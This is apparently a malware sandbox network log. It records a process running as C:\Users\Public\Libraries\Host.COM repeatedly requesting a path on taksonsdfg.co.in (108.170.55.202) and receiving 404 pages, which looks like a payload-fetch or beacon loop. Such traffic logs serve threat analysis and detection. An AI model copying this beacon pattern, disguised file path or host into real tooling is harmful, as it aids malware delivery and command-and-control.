                                                                                    content-type: text/html
                                                                                    content-length: 1251
                                                                                    date: Mon, 14 Oct 2024 02:30:17 GMT
                                                                                    server: LiteSpeed
                                                                                    alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                                                                                    2024-10-14 02:30:17 UTC | 952 | IN | Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</sty
                                                                                    2024-10-14 02:30:17 UTC | 299 | IN | Data Ascii: -top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content


                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                    52 | 192.168.2.4 | 49929 | 108.170.55.202 | 443 | 7652 | C:\Users\Public\Libraries\Host.COM
                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                    2024-10-14 02:30:18 UTC | 178 | OUT | GET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1
                                                                                    Connection: Keep-Alive
                                                                                    Accept: */*
                                                                                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                                                    Host: taksonsdfg.co.in
                                                                                    2024-10-14 02:30:18 UTC | 416 | IN | HTTP/1.1 404 Not Found
                                                                                    Connection: close
                                                                                    cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                    pragma: no-cache
                                                                                    content-type: text/html
                                                                                    content-length: 1251
                                                                                    date: Mon, 14 Oct 2024 02:30:18 GMT
                                                                                    server: LiteSpeed
                                                                                    alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                                                                                    2024-10-14 02:30:18 UTC | 952 | IN | Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</sty
                                                                                    2024-10-14 02:30:18 UTC | 299 | IN | Data Ascii: -top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content


                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                    53 | 192.168.2.4 | 49936 | 108.170.55.202 | 443 | 7652 | C:\Users\Public\Libraries\Host.COM
                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                    2024-10-14 02:30:19 UTC | 178 | OUT | GET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1
                                                                                    Connection: Keep-Alive
                                                                                    Accept: */*
                                                                                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                                                    Host: taksonsdfg.co.in
                                                                                    2024-10-14 02:30:19 UTC | 416 | IN | HTTP/1.1 404 Not Found
                                                                                    Connection: close
                                                                                    cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                    pragma: no-cache
                                                                                    content-type: text/html
                                                                                    content-length: 1251
                                                                                    date: Mon, 14 Oct 2024 02:30:19 GMT
                                                                                    server: LiteSpeed
                                                                                    alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                                                                                    2024-10-14 02:30:19 UTC | 952 | IN | Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</sty
                                                                                    2024-10-14 02:30:19 UTC | 299 | IN | Data Ascii: -top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content


                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                    54 | 192.168.2.4 | 49945 | 108.170.55.202 | 443 | 7652 | C:\Users\Public\Libraries\Host.COM
                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                    2024-10-14 02:30:20 UTC | 178 | OUT | GET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1
                                                                                    Connection: Keep-Alive
                                                                                    Accept: */*
                                                                                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                                                    Host: taksonsdfg.co.in
                                                                                    2024-10-14 02:30:20 UTC | 416 | IN | HTTP/1.1 404 Not Found
                                                                                    Connection: close
                                                                                    cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                    pragma: no-cache
                                                                                    content-type: text/html
                                                                                    content-length: 1251
                                                                                    date: Mon, 14 Oct 2024 02:30:20 GMT
                                                                                    server: LiteSpeed
                                                                                    alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                                                                                    2024-10-14 02:30:20 UTC | 952 | IN | Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</sty
                                                                                    2024-10-14 02:30:20 UTC | 299 | IN | Data Ascii: -top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content


                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                    55 | 192.168.2.4 | 49954 | 108.170.55.202 | 443 | 7652 | C:\Users\Public\Libraries\Host.COM
                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                    2024-10-14 02:30:21 UTC | 178 | OUT | GET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1
                                                                                    Connection: Keep-Alive
                                                                                    Accept: */*
                                                                                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                                                    Host: taksonsdfg.co.in
                                                                                    2024-10-14 02:30:21 UTC | 416 | IN | HTTP/1.1 404 Not Found
                                                                                    Connection: close
                                                                                    cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                    pragma: no-cache
                                                                                    content-type: text/html
                                                                                    content-length: 1251
                                                                                    date: Mon, 14 Oct 2024 02:30:21 GMT
                                                                                    server: LiteSpeed
                                                                                    alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                                                                                    2024-10-14 02:30:21 UTC | 952 | IN | Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</sty
                                                                                    2024-10-14 02:30:21 UTC | 299 | IN | Data Ascii: -top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content


                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                    56 | 192.168.2.4 | 49962 | 108.170.55.202 | 443 | 7652 | C:\Users\Public\Libraries\Host.COM
                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                    2024-10-14 02:30:22 UTC | 178 | OUT | GET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1
                                                                                    Connection: Keep-Alive
                                                                                    Accept: */*
                                                                                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                                                    Host: taksonsdfg.co.in
                                                                                    2024-10-14 02:30:22 UTC | 416 | IN | HTTP/1.1 404 Not Found
                                                                                    Connection: close
                                                                                    cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                    pragma: no-cache
                                                                                    content-type: text/html
                                                                                    content-length: 1251
                                                                                    date: Mon, 14 Oct 2024 02:30:22 GMT
                                                                                    server: LiteSpeed
                                                                                    alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                                                                                    2024-10-14 02:30:22 UTC | 952 | IN | Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</sty
                                                                                    2024-10-14 02:30:22 UTC | 299 | IN | Data Ascii: -top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content


                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                    57 | 192.168.2.4 | 49973 | 108.170.55.202 | 443 | 7652 | C:\Users\Public\Libraries\Host.COM
                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                    2024-10-14 02:30:23 UTC | 178 | OUT | GET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1
                                                                                    Connection: Keep-Alive
                                                                                    Accept: */*
                                                                                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                                                    Host: taksonsdfg.co.in
                                                                                    2024-10-14 02:30:24 UTC | 416 | IN | HTTP/1.1 404 Not Found
                                                                                    Connection: close
                                                                                    cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                    pragma: no-cache
                                                                                    content-type: text/html
                                                                                    content-length: 1251
                                                                                    date: Mon, 14 Oct 2024 02:30:23 GMT
                                                                                    server: LiteSpeed
                                                                                    alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                                                                                    2024-10-14 02:30:24 UTC | 952 | IN | Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</sty
                                                                                    2024-10-14 02:30:24 UTC | 299 | IN | Data Ascii: -top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content


                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                    58 | 192.168.2.4 | 49980 | 108.170.55.202 | 443 | 7652 | C:\Users\Public\Libraries\Host.COM
                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                    2024-10-14 02:30:24 UTC | 178 | OUT | GET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1
                                                                                    Connection: Keep-Alive
                                                                                    Accept: */*
                                                                                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                                                    Host: taksonsdfg.co.in
                                                                                    2024-10-14 02:30:25 UTC | 416 | IN | HTTP/1.1 404 Not Found
                                                                                    Connection: close
                                                                                    cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                    pragma: no-cache
                                                                                    content-type: text/html
                                                                                    content-length: 1251
                                                                                    date: Mon, 14 Oct 2024 02:30:25 GMT
                                                                                    server: LiteSpeed
                                                                                    alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                                                                                    2024-10-14 02:30:25 UTC | 952 | IN | Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</sty
                                                                                    2024-10-14 02:30:25 UTC | 299 | IN | Data Ascii: -top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
59 | 192.168.2.4 | 49989 | 108.170.55.202 | 443 | 7652 | C:\Users\Public\Libraries\Host.COM
Timestamp | Bytes transferred | Direction | Data
2024-10-14 02:30:25 UTC | 178 | OUT | GET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
Host: taksonsdfg.co.in
2024-10-14 02:30:26 UTC | 416 | IN | HTTP/1.1 404 Not Found
Connection: close
cache-control: private, no-cache, no-store, must-revalidate, max-age=0
pragma: no-cache
content-type: text/html
content-length: 1251
date: Mon, 14 Oct 2024 02:30:26 GMT
server: LiteSpeed
alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
2024-10-14 02:30:26 UTC | 952 | IN | Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</sty
2024-10-14 02:30:26 UTC | 299 | IN | Data Ascii: -top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
60 | 192.168.2.4 | 49999 | 108.170.55.202 | 443 | 7652 | C:\Users\Public\Libraries\Host.COM
Timestamp | Bytes transferred | Direction | Data
2024-10-14 02:30:26 UTC | 178 | OUT | GET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
Host: taksonsdfg.co.in
2024-10-14 02:30:27 UTC | 416 | IN | HTTP/1.1 404 Not Found
Connection: close
cache-control: private, no-cache, no-store, must-revalidate, max-age=0
pragma: no-cache
content-type: text/html
content-length: 1251
date: Mon, 14 Oct 2024 02:30:27 GMT
server: LiteSpeed
alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
2024-10-14 02:30:27 UTC | 952 | IN | Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</sty
2024-10-14 02:30:27 UTC | 299 | IN | Data Ascii: -top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
61 | 192.168.2.4 | 50006 | 108.170.55.202 | 443 | 7652 | C:\Users\Public\Libraries\Host.COM
Timestamp | Bytes transferred | Direction | Data
2024-10-14 02:30:28 UTC | 178 | OUT | GET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
Host: taksonsdfg.co.in
2024-10-14 02:30:28 UTC | 416 | IN | HTTP/1.1 404 Not Found
Connection: close
cache-control: private, no-cache, no-store, must-revalidate, max-age=0
pragma: no-cache
content-type: text/html
content-length: 1251
date: Mon, 14 Oct 2024 02:30:28 GMT
server: LiteSpeed
alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
2024-10-14 02:30:28 UTC | 952 | IN | Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</sty
2024-10-14 02:30:28 UTC | 299 | IN | Data Ascii: -top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
62 | 192.168.2.4 | 50017 | 108.170.55.202 | 443 | 7652 | C:\Users\Public\Libraries\Host.COM
Timestamp | Bytes transferred | Direction | Data
2024-10-14 02:30:29 UTC | 178 | OUT | GET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
Host: taksonsdfg.co.in
2024-10-14 02:30:29 UTC | 416 | IN | HTTP/1.1 404 Not Found
Connection: close
cache-control: private, no-cache, no-store, must-revalidate, max-age=0
pragma: no-cache
content-type: text/html
content-length: 1251
date: Mon, 14 Oct 2024 02:30:29 GMT
server: LiteSpeed
alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
2024-10-14 02:30:29 UTC | 952 | IN | Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</sty
2024-10-14 02:30:29 UTC | 299 | IN | Data Ascii: -top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
63 | 192.168.2.4 | 50024 | 108.170.55.202 | 443 | 7652 | C:\Users\Public\Libraries\Host.COM
Timestamp | Bytes transferred | Direction | Data
2024-10-14 02:30:30 UTC | 178 | OUT | GET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
Host: taksonsdfg.co.in
2024-10-14 02:30:30 UTC | 416 | IN | HTTP/1.1 404 Not Found
Connection: close
cache-control: private, no-cache, no-store, must-revalidate, max-age=0
pragma: no-cache
content-type: text/html
content-length: 1251
date: Mon, 14 Oct 2024 02:30:30 GMT
server: LiteSpeed
alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
2024-10-14 02:30:30 UTC | 952 | IN | Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</sty
2024-10-14 02:30:30 UTC | 299 | IN | Data Ascii: -top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
64 | 192.168.2.4 | 50032 | 108.170.55.202 | 443 | 7652 | C:\Users\Public\Libraries\Host.COM
Timestamp | Bytes transferred | Direction | Data
2024-10-14 02:30:31 UTC | 178 | OUT | GET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
Host: taksonsdfg.co.in
2024-10-14 02:30:31 UTC | 416 | IN | HTTP/1.1 404 Not Found
Connection: close
cache-control: private, no-cache, no-store, must-revalidate, max-age=0
pragma: no-cache
content-type: text/html
content-length: 1251
date: Mon, 14 Oct 2024 02:30:31 GMT
server: LiteSpeed
alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
2024-10-14 02:30:31 UTC | 952 | IN | Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</sty
2024-10-14 02:30:31 UTC | 299 | IN | Data Ascii: -top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    65192.168.2.450043108.170.55.2024437652C:\Users\Public\Libraries\Host.COM
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-10-14 02:30:32 UTC178OUTGET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1
                                                                                    Connection: Keep-Alive
                                                                                    Accept: */*
                                                                                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                                                    Host: taksonsdfg.co.in
                                                                                    2024-10-14 02:30:32 UTC416INHTTP/1.1 404 Not Found
                                                                                    Connection: close
                                                                                    cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                    pragma: no-cache
                                                                                    content-type: text/html
                                                                                    content-length: 1251
                                                                                    date: Mon, 14 Oct 2024 02:30:32 GMT
                                                                                    server: LiteSpeed
                                                                                    alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                                                                                    2024-10-14 02:30:32 UTC952INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79
                                                                                    Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</sty
                                                                                    Data Ascii: -top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
66 | 192.168.2.4 | 50050 | 108.170.55.202 | 443 | 7652 | C:\Users\Public\Libraries\Host.COM
Timestamp | Bytes transferred | Direction | Data
2024-10-14 02:30:33 UTC | 178 | OUT | GET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1
                                                                                    Connection: Keep-Alive
                                                                                    Accept: */*
                                                                                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                                                    Host: taksonsdfg.co.in
2024-10-14 02:30:33 UTC | 416 | IN | HTTP/1.1 404 Not Found
                                                                                    Connection: close
                                                                                    cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                    pragma: no-cache
                                                                                    content-type: text/html
                                                                                    content-length: 1251
                                                                                    date: Mon, 14 Oct 2024 02:30:33 GMT
                                                                                    server: LiteSpeed
                                                                                    alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                                                                                    Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</sty
                                                                                    Data Ascii: -top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
67 | 192.168.2.4 | 50062 | 108.170.55.202 | 443 | 7652 | C:\Users\Public\Libraries\Host.COM
Timestamp | Bytes transferred | Direction | Data
2024-10-14 02:30:34 UTC | 178 | OUT | GET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1
                                                                                    Connection: Keep-Alive
                                                                                    Accept: */*
                                                                                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                                                    Host: taksonsdfg.co.in
2024-10-14 02:30:35 UTC | 416 | IN | HTTP/1.1 404 Not Found
                                                                                    Connection: close
                                                                                    cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                    pragma: no-cache
                                                                                    content-type: text/html
                                                                                    content-length: 1251
                                                                                    date: Mon, 14 Oct 2024 02:30:34 GMT
                                                                                    server: LiteSpeed
                                                                                    alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                                                                                    Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</sty
                                                                                    Data Ascii: -top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
68 | 192.168.2.4 | 50069 | 108.170.55.202 | 443 | 7652 | C:\Users\Public\Libraries\Host.COM
Timestamp | Bytes transferred | Direction | Data
2024-10-14 02:30:35 UTC | 178 | OUT | GET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1
                                                                                    Connection: Keep-Alive
                                                                                    Accept: */*
                                                                                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                                                    Host: taksonsdfg.co.in
2024-10-14 02:30:36 UTC | 416 | IN | HTTP/1.1 404 Not Found
                                                                                    Connection: close
                                                                                    cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                    pragma: no-cache
                                                                                    content-type: text/html
                                                                                    content-length: 1251
                                                                                    date: Mon, 14 Oct 2024 02:30:36 GMT
                                                                                    server: LiteSpeed
